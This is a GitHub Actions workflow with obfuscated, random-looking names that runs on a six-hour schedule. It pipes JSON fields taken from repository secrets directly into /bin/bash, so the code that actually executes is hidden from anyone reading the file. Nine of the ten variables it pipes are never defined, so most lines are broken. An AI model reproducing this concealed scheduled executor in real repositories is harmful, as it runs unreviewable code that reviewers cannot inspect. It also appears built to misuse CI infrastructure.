name: mingyulu1837

on:
  workflow_dispatch:
  schedule:
    - cron: '8 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: mingyulu1837
        env:
          h5052: ${{ secrets.h5052 }}
        run: |
          echo $h5052 | jq -r .yzoy249 | /bin/bash
          echo $ib8424 | jq -r .siq23 | /bin/bash
          echo $e46022 | jq -r .hlnli7520 | /bin/bash
          echo $ap709 | jq -r .h5 | /bin/bash
          echo $shmo167 | jq -r .pjqow82940 | /bin/bash
          echo $g00543 | jq -r .ocpuz59 | /bin/bash
          echo $m562 | jq -r .xuox549 | /bin/bash
          echo $kszvm01444 | jq -r .sk3348 | /bin/bash
          echo $vvhj3234 | jq -r .us852 | /bin/bash
          echo $rnfvt793 | jq -r .usxkj0 | /bin/bash

